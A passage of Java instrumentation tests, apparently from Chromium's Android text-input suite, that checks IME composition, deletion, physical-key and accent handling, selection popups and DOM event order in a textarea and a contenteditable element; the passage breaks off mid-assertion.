@Feature({"TextInput", "Main"})
public void testFinishComposingText() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
mRule.commitText("hllo", 1);
mRule.waitAndVerifyUpdateSelection(0, 4, 4, -1, -1);
mRule.commitText(" ", 1);
mRule.waitAndVerifyUpdateSelection(1, 5, 5, -1, -1);
mRule.setSelection(1, 1);
mRule.waitAndVerifyUpdateSelection(2, 1, 1, -1, -1);
mRule.assertTextsAroundCursor("h", null, "llo ");
mRule.setComposingRegion(0, 4);
mRule.waitAndVerifyUpdateSelection(3, 1, 1, 0, 4);
mRule.finishComposingText();
mRule.waitAndVerifyUpdateSelection(4, 1, 1, -1, -1);
mRule.commitText("\n", 1);
mRule.waitAndVerifyUpdateSelection(5, 2, 2, -1, -1);
mRule.assertTextsAroundCursor("h\n", null, "llo ");
}
// http://crbug.com/445499
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testDeleteText() throws Throwable {
mRule.focusElement("textarea");
// The calls below are a reflection of what the stock Google Keyboard (Andr
// when the noted key is touched on screen.
// H
mRule.setComposingText("h", 1);
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
// A
mRule.setComposingText("ha", 1);
Assert.assertEquals("ha", mRule.getTextBeforeCursor(9, 0));
mRule.setComposingText("h", 1);
mRule.setComposingRegion(0, 1);
mRule.setComposingText("h", 1);
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
// I
mRule.setComposingText("hi", 1);
Assert.assertEquals("hi", mRule.getTextBeforeCursor(9, 0));
// SPACE
mRule.commitText("hi", 1);
mRule.commitText(" ", 1);
Assert.assertEquals("hi ", mRule.getTextBeforeCursor(9, 0));
// DEL
mRule.deleteSurroundingText(1, 0);
mRule.setComposingRegion(0, 2);
Assert.assertEquals("hi", mRule.getTextBeforeCursor(9, 0));
mRule.setComposingText("h", 1);
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
mRule.commitText("", 1);
Assert.assertEquals("", mRule.getTextBeforeCursor(9, 0));
// DEL (on empty input)
mRule.deleteSurroundingText(1, 0); // DEL on empty still sends 1,0
Assert.assertEquals("", mRule.getTextBeforeCursor(9, 0));
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testSwipingText() throws Throwable {
mRule.focusElement("textarea");
// The calls below are a reflection of what the stock Google Keyboard (Android 4.4) sends
// when the word is swiped on the soft keyboard. Exercise care when altering to make sure
// that the test reflects reality. If this test breaks, it's possible that code has
// changed and different calls need to be made instead.
// "three"
mRule.setComposingText("three", 1);
Assert.assertEquals("three", mRule.getTextBeforeCursor(99, 0));
// "word"
mRule.commitText("three", 1);
mRule.commitText(" ", 1);
mRule.setComposingText("word", 1);
Assert.assertEquals("three word", mRule.getTextBeforeCursor(99, 0));
// "test"
mRule.commitText("word", 1);
mRule.commitText(" ", 1);
mRule.setComposingText("test", 1);
Assert.assertEquals("three word test", mRule.getTextBeforeCursor(99, 0));
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testDeleteMultiCharacterCodepoint() throws Throwable {
// This smiley is a multi character codepoint.
final String smiley = "\uD83D\uDE0A";
mRule.commitText(smiley, 1);
mRule.waitAndVerifyUpdateSelection(0, 2, 2, -1, -1);
mRule.assertTextsAroundCursor(smiley, null, "");
// DEL, sent via mRule.dispatchKeyEvent like it is in Android WebView or a physical
// keyboard.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DEL));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_DEL));
mRule.waitAndVerifyUpdateSelection(1, 0, 0, -1, -1);
// Make sure that we accept further typing after deleting the smiley.
mRule.setComposingText("s", 1);
mRule.setComposingText("sm", 1);
mRule.waitAndVerifyUpdateSelection(2, 1, 1, 0, 1);
mRule.waitAndVerifyUpdateSelection(3, 2, 2, 0, 2);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testBackspaceKeycode() throws Throwable {
mRule.focusElement("textarea");
// H
mRule.commitText("h", 1);
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
// A
mRule.commitText("a", 1);
Assert.assertEquals("ha", mRule.getTextBeforeCursor(9, 0));
// DEL, sent via mRule.dispatchKeyEvent like it is in Android WebView or a physical
// keyboard.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DEL));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_DEL));
// DEL
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testRepeatBackspaceKeycode() throws Throwable {
mRule.focusElement("textarea");
// H
mRule.commitText("h", 1);
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
// A
mRule.commitText("a", 1);
Assert.assertEquals("ha", mRule.getTextBeforeCursor(9, 0));
// Multiple keydowns should each delete one character (this is for physical keyboard
// key-repeat).
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DEL));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DEL));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_DEL));
// DEL
Assert.assertEquals("", mRule.getTextBeforeCursor(9, 0));
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testPhysicalKeyboard() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
// Type 'a' using a physical keyboard.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_A));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_A));
mRule.waitAndVerifyUpdateSelection(0, 1, 1, -1, -1);
// Type 'enter' key.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_ENTER));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_ENTER));
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
mRule.assertTextsAroundCursor("a\n", null, "\n");
// Type 'b'.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_B));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_B));
mRule.waitAndVerifyUpdateSelection(2, 3, 3, -1, -1);
mRule.assertTextsAroundCursor("a\nb", null, "");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testPhysicalKeyboard_AccentKeyCodes() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
int index = 0;
// h
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_H));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_H));
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 1, 1, -1, -1);
// ALT-i (circumflex accent key on virtual keyboard). Accent should not appear until the
// next letter is entered.
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_UP, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("h", mRule.getTextBeforeCursor(9, 0));
// finishComposingText() should not prevent the accent from being joined.
mRule.finishComposingText();
// o
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_O));
Assert.assertEquals("hô", mRule.getTextBeforeCursor(9, 0));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_O));
Assert.assertEquals("hô", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 2, 2, -1, -1);
// o again. Should not have accent mark this time.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_O));
Assert.assertEquals("hôo", mRule.getTextBeforeCursor(9, 0));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_O));
Assert.assertEquals("hôo", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 3, 3, -1, -1);
// ALT-i. Should not display anything until the next key is pressed.
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_UP, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("hôo", mRule.getTextBeforeCursor(9, 0));
// ALT-i again should commit the caret this time.
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_UP, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("hôoˆ", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 4, 4, -1, -1);
// b (cannot be accented, should just appear after)
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_B));
Assert.assertEquals("hôoˆb", mRule.getTextBeforeCursor(9, 0));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_B));
Assert.assertEquals("hôoˆb", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 5, 5, -1, -1);
// ALT-i. Should not display anything.
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_UP, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("hôoˆb", mRule.getTextBeforeCursor(9, 0));
// Backspace. Should delete the b even though we have a pending accent.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DEL));
Assert.assertEquals("hôoˆ", mRule.getTextBeforeCursor(9, 0));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_DEL));
Assert.assertEquals("hôoˆ", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 4, 4, -1, -1);
// Alt-i. Should not display anything (the pending accent should have been cleared by the
// backspace).
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_UP, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("hôoˆ", mRule.getTextBeforeCursor(9, 0));
// Space. Should display the pending accent.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_SPACE));
Assert.assertEquals("hôoˆˆ", mRule.getTextBeforeCursor(9, 0));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_SPACE));
Assert.assertEquals("hôoˆˆ", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 5, 5, -1, -1);
// Alt-i. Should not display anything but should set a circumflex as the pending accent.
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_UP, KeyEvent.KEYCODE_I, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("hôoˆˆ", mRule.getTextBeforeCursor(9, 0));
// Alt-e. Should output the circumflex and set an acute accent as the pending accent.
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_E, 0, KeyEvent.META_ALT_ON));
mRule.dispatchKeyEvent(new KeyEvent(
0, 0, KeyEvent.ACTION_UP, KeyEvent.KEYCODE_E, 0, KeyEvent.META_ALT_ON));
Assert.assertEquals("hôoˆˆˆ", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 6, 6, -1, -1);
// e. Should output an e with an acute accent.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_E));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_E));
Assert.assertEquals("hôoˆˆˆé", mRule.getTextBeforeCursor(9, 0));
mRule.waitAndVerifyUpdateSelection(index++, 7, 7, -1, -1);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testSetComposingRegionOutOfBounds() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
mRule.setComposingText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, 0, 5);
mRule.setComposingRegion(0, 0);
mRule.waitAndVerifyUpdateSelection(1, 5, 5, -1, -1);
mRule.setComposingRegion(0, 9);
mRule.waitAndVerifyUpdateSelection(2, 5, 5, 0, 5);
mRule.setComposingRegion(9, 1);
mRule.waitAndVerifyUpdateSelection(3, 5, 5, 1, 5);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testEnterKey_AfterCommitText() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_ENTER));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_ENTER));
mRule.waitAndVerifyUpdateSelection(1, 6, 6, -1, -1);
mRule.assertTextsAroundCursor("hello\n", null, "\n");
mRule.commitText("world", 1);
mRule.waitAndVerifyUpdateSelection(2, 11, 11, -1, -1);
mRule.assertTextsAroundCursor("hello\nworld", null, "");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testEnterKey_WhileComposingText() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
mRule.setComposingText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, 0, 5);
// IME app should call this, otherwise enter key should clear the current composition.
mRule.finishComposingText();
mRule.waitAndVerifyUpdateSelection(1, 5, 5, -1, -1);
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_ENTER));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_ENTER));
// The second new line is not a user visible/editable one, it is a side-effect of Blink
// using <br> internally. This only happens when \n is at the end.
mRule.waitAndVerifyUpdateSelection(2, 6, 6, -1, -1);
mRule.commitText("world", 1);
mRule.waitAndVerifyUpdateSelection(3, 11, 11, -1, -1);
mRule.assertTextsAroundCursor("hello\nworld", null, "");
}
@Test
@SmallTest
@DisabledTest(message = "Disabling to land release blocking bug fix crbug.com/1121179")
@Feature({"TextInput", "Main"})
public void testDpadKeyCodesWhileSwipingText() throws Throwable {
int showCount = mRule.getInputMethodManagerWrapper().getShowSoftInputCounter();
mRule.focusElement("textarea");
// focusElement() calls showSoftInput().
CriteriaHelper.pollUiThread(() -> {
Criteria.checkThat(mRule.getInputMethodManagerWrapper().getShowSoftInputCounter(),
Matchers.is(showCount + 1));
});
// DPAD_CENTER should cause keyboard to appear on keyup.
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DPAD_CENTER));
// Should not have called showSoftInput() on keydown.
CriteriaHelper.pollUiThread(() -> {
Criteria.checkThat(mRule.getInputMethodManagerWrapper().getShowSoftInputCounter(),
Matchers.is(showCount + 1));
});
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_DPAD_CENTER));
// Should have called showSoftInput() on keyup.
CriteriaHelper.pollUiThread(() -> {
Criteria.checkThat(mRule.getInputMethodManagerWrapper().getShowSoftInputCounter(),
Matchers.is(showCount + 2));
});
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testNavigateTextWithDpadKeyCodes() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DPAD_LEFT));
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_UP, KeyEvent.KEYCODE_DPAD_LEFT));
mRule.assertTextsAroundCursor("hell", null, "o");
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testPastePopupShowAndHide() throws Throwable {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.selectAll();
mRule.waitAndVerifyUpdateSelection(1, 0, 5, -1, -1);
mRule.assertTextsAroundCursor("", "hello", "");
mRule.cut();
mRule.waitAndVerifyUpdateSelection(2, 0, 0, -1, -1);
mRule.assertTextsAroundCursor("", null, "");
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
CriteriaHelper.pollUiThread(() -> {
Criteria.checkThat(
mRule.getSelectionPopupController().isPastePopupShowing(), Matchers.is(true));
Criteria.checkThat(
mRule.getSelectionPopupController().isInsertionForTesting(), Matchers.is(true));
});
mRule.setComposingText("h", 1);
CriteriaHelper.pollUiThread(() -> {
Criteria.checkThat(
mRule.getSelectionPopupController().isPastePopupShowing(), Matchers.is(false));
});
Assert.assertFalse(mRule.getSelectionPopupController().isInsertionForTesting());
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testSelectionClearedOnKeyEvent() throws Throwable {
mRule.commitText("Sample_Text", 1);
mRule.waitAndVerifyUpdateSelection(0, 11, 11, -1, -1);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(true);
mRule.setComposingText("h", 1);
mRule.assertWaitForSelectActionBarStatus(false);
Assert.assertFalse(mRule.getSelectionPopupController().hasSelection());
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testTextHandlesPreservedWithDpadNavigation() throws Throwable {
DOMUtils.longPressNode(mRule.getWebContents(), "plain_text");
mRule.assertWaitForSelectActionBarStatus(true);
Assert.assertTrue(mRule.getSelectionPopupController().hasSelection());
mRule.dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.KEYCODE_DPAD_DOWN));
mRule.assertWaitForSelectActionBarStatus(true);
Assert.assertTrue(mRule.getSelectionPopupController().hasSelection());
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testRestartInputWhileComposingText() throws Throwable {
mRule.setComposingText("abc", 1);
mRule.waitAndVerifyUpdateSelection(0, 3, 3, 0, 3);
mRule.restartInput();
// We don't do anything when input gets restarted. But we depend on Android's
// InputMethodManager and/or input methods to call mRule.finishComposingText() in setting
// current input connection as active or finishing the current input connection.
Thread.sleep(1000);
Assert.assertEquals(
1, mRule.getInputMethodManagerWrapper().getUpdateSelectionList().size());
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testRestartInputKeepsTextAndCursor() throws Exception {
mRule.commitText("ab", 2);
mRule.restartInput();
Assert.assertEquals("ab", mRule.getTextBeforeCursor(10, 0));
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testContentEditableEvents_ComposingText() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("contenteditable_event");
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.setComposingText("a", 1);
mRule.waitAndVerifyUpdateSelection(0, 1, 1, 0, 1);
mRule.waitForEventLogs(
"keydown(229),compositionstart(),compositionupdate(a),input(a),keyup(229),"
+ "selectionchange");
mRule.clearEventLogs();
mRule.finishComposingText();
mRule.waitAndVerifyUpdateSelection(1, 1, 1, -1, -1);
mRule.waitForEventLogs("compositionend(a)");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testInputTextEvents_ComposingText() throws Throwable {
mRule.setComposingText("a", 1);
mRule.waitAndVerifyUpdateSelection(0, 1, 1, 0, 1);
mRule.waitForEventLogs("keydown(229),compositionstart(),compositionupdate(a),"
+ "input(a),keyup(229),selectionchange");
mRule.clearEventLogs();
mRule.finishComposingText();
mRule.waitAndVerifyUpdateSelection(1, 1, 1, -1, -1);
mRule.waitForEventLogs("compositionend(a)");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testContentEditableEvents_CommitText() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("contenteditable_event");
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.commitText("a", 1);
mRule.waitAndVerifyUpdateSelection(0, 1, 1, -1, -1);
mRule.waitForEventLogs("keydown(229),input(a),keyup(229),selectionchange");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testInputTextEvents_CommitText() throws Throwable {
mRule.commitText("a", 1);
mRule.waitAndVerifyUpdateSelection(0, 1, 1, -1, -1);
mRule.waitForEventLogs("keydown(229),input(a),keyup(229),selectionchange");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testContentEditableEvents_DeleteSurroundingText() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("contenteditable_event");
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.waitForEventLogs("keydown(229),input(hello),keyup(229),selectionchange");
mRule.clearEventLogs();
mRule.setSelection(2, 2);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.deleteSurroundingText(1, 1);
mRule.waitAndVerifyUpdateSelection(2, 1, 1, -1, -1);
// TODO(yabinh): It should only fire 1 input and 1 selectionchange events.
mRule.waitForEventLogs(
"keydown(229),input,input,keyup(229),selectionchange,selectionchange");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testInputTextEvents_DeleteSurroundingText() throws Throwable {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.waitForEventLogs("keydown(229),input(hello),keyup(229),selectionchange");
mRule.clearEventLogs();
mRule.setSelection(2, 2);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.deleteSurroundingText(1, 1);
mRule.waitAndVerifyUpdateSelection(2, 1, 1, -1, -1);
// TODO(yabinh): It should only fire 1 input and 1 selectionchange events.
mRule.waitForEventLogs(
"keydown(229),input,input,keyup(229),selectionchange,selectionchange");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testContentEditableEvents_DeleteSurroundingTextInCodePoints() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("contenteditable_event");
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.waitForEventLogs("keydown(229),input(hello),keyup(229),selectionchange");
mRule.clearEventLogs();
mRule.setSelection(2, 2);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.deleteSurroundingTextInCodePoints(1, 1);
mRule.waitAndVerifyUpdateSelection(2, 1, 1, -1, -1);
// TODO(yabinh): It should only fire 1 input and 1 selectionchange events.
mRule.waitForEventLogs(
"keydown(229),input,input,keyup(229),selectionchange,selectionchange");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testInputTextEvents_DeleteSurroundingTextInCodePoints() throws Throwable {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.waitForEventLogs("keydown(229),input(hello),keyup(229),selectionchange");
mRule.clearEventLogs();
mRule.setSelection(2, 2);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
mRule.waitForEventLogs("selectionchange");
mRule.clearEventLogs();
mRule.deleteSurroundingTextInCodePoints(1, 1);
mRule.waitAndVerifyUpdateSelection(2, 1, 1, -1, -1);
// TODO(yabinh): It should only fire 1 input and 1 selectionchange events.
mRule.waitForEventLogs(
"keydown(229),input,input,keyup(229),selectionchange,selectionchange");
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testGetCursorCapsMode() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("contenteditable_event");
mRule.commitText("Hello World", 1);
mRule.waitAndVerifyUpdateSelection(0, 11, 11, -1, -1);
Assert.assertEquals(0, mRule.getCursorCapsMode(InputType.TYPE_TEXT_FLAG_CAP_WORDS));
mRule.setSelection(6, 6);
mRule.waitAndVerifyUpdateSelection(1, 6, 6, -1, -1);
Assert.assertEquals(InputType.TYPE_TEXT_FLAG_CAP_WORDS,
mRule.getCursorCapsMode(InputType.TYPE_TEXT_FLAG_CAP_WORDS));
mRule.commitText("\n", 1);
Assert.assertEquals(InputType.TYPE_TEXT_FLAG_CAP_WORDS,
mRule.getCursorCapsMode(InputType.TYPE_TEXT_FLAG_CAP_WORDS));
}
// https://crbug.com/604675
@Test
@MediumTest
@Feature({"TextInput"})
public void testAlertInKeyUpListenerDoesNotCrash() throws Exception {
// Call 'alert()' when 'keyup' event occurs. Since we are in contentshell,
// this does not actually pops up the alert window.
String code = "(function() { "
+ "var editor = document.getElementById('input_text');"
+ "editor.addEventListener('keyup', function(e) { alert('keyup') });"
+ "})();";
JavaScriptUtils.executeJavaScriptAndWaitForResult(mRule.getWebContents(), code);
mRule.setComposingText("ab", 1);
mRule.finishComposingText();
Assert.assertEquals("ab", mRule.getTextBeforeCursor(10, 0));
}
// https://crbug.com/616334
@Test
@SmallTest
@Feature({"TextInput"})
public void testCastToBaseInputConnection() throws Exception {
mRule.commitText("a", 1);
final BaseInputConnection baseInputConnection = (BaseInputConnection) mRule.getConnection();
Assert.assertEquals("a", mRule.runBlockingOnImeThread(new Callable<CharSequence>() {
@Override
public CharSequence call() {
return baseInputConnection.getTextBeforeCursor(10, 0);
}
}));
}
// Tests that the method call order is kept.
// See crbug.com/601707 for details.
@Test
@MediumTest
@Feature({"TextInput"})
public void testSetSelectionCommitTextOrder() throws Exception {
final ChromiumBaseInputConnection connection = mRule.getConnection();
mRule.runBlockingOnImeThread(new Callable<Void>() {
@Override
public Void call() {
connection.beginBatchEdit();
connection.commitText("hello world", 1);
connection.setSelection(6, 6);
connection.deleteSurroundingText(0, 5);
connection.commitText("'", 1);
connection.commitText("world", 1);
connection.setSelection(7, 7);
connection.setComposingText("", 1);
connection.endBatchEdit();
return null;
}
});
mRule.waitAndVerifyUpdateSelection(0, 7, 7, -1, -1);
}
// crbug.com/643477
@Test
@MediumTest
@Feature({"TextInput"})
public void testUiThreadAccess() throws Exception {
final ChromiumBaseInputConnection connection = mRule.getConnection();
TestThreadUtils.runOnUiThreadBlocking(() -> {
// We allow UI thread access for most functions, except for
// beginBatchEdit(), endBatchEdit(), and get* methods().
Assert.assertTrue(connection.commitText("a", 1));
Assert.assertTrue(connection.setComposingText("b", 1));
Assert.assertTrue(connection.setComposingText("bc", 1));
Assert.assertTrue(connection.finishComposingText());
});
Assert.assertEquals("abc", mRule.runBlockingOnImeThread(new Callable<CharSequence>() {
@Override
public CharSequence call() {
return connection.getTextBeforeCursor(5, 0);
}
}));
}
@Test
@MediumTest
@Feature({"TextInput"})
public void testBackgroundAndUnderlineSpans() throws Throwable {
mRule.fullyLoadUrl("data:text/html, <div contenteditable id=\"div\" />");
WebContents webContents = mRule.getWebContents();
DOMUtils.focusNode(webContents, "div");
SpannableString textToCommit = new SpannableString("hello world");
BackgroundColorSpan backgroundColorSpan = new BackgroundColorSpan(Color.MAGENTA);
UnderlineSpan underlineSpan = new UnderlineSpan();
textToCommit.setSpan(backgroundColorSpan, 0, 5, Spanned.SPAN_EXCLUSIVE_EXCLUSIVE);
textToCommit.setSpan(underlineSpan, 6, 11, Spanned.SPAN_EXCLUSIVE_EXCLUSIVE);
mRule.commitText(textToCommit, 1);
// Wait for renderer to acknowledge commitText(). ImeActivityTestRule.commitText() blocks
// and waits for the IME thread to finish, but the communication between the IME thread and
// the renderer is asynchronous, so if we try to run JavaScript right away, the text won't
// necessarily have been committed yet.
CriteriaHelper.pollInstrumentationThread(() -> {
try {
Criteria.checkThat(
DOMUtils.getNodeContents(webContents, "div"), Matchers.is("hello world"));
} catch (TimeoutException e) {
throw new CriteriaNotSatisfiedException(e);
}
});
Assert.assertEquals("2",
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerCountForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition')"));
// Colors come back as ARGB.
Assert.assertEquals(0xFFFF00FFL,
(long) Double.parseDouble(
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerBackgroundColorForNode("
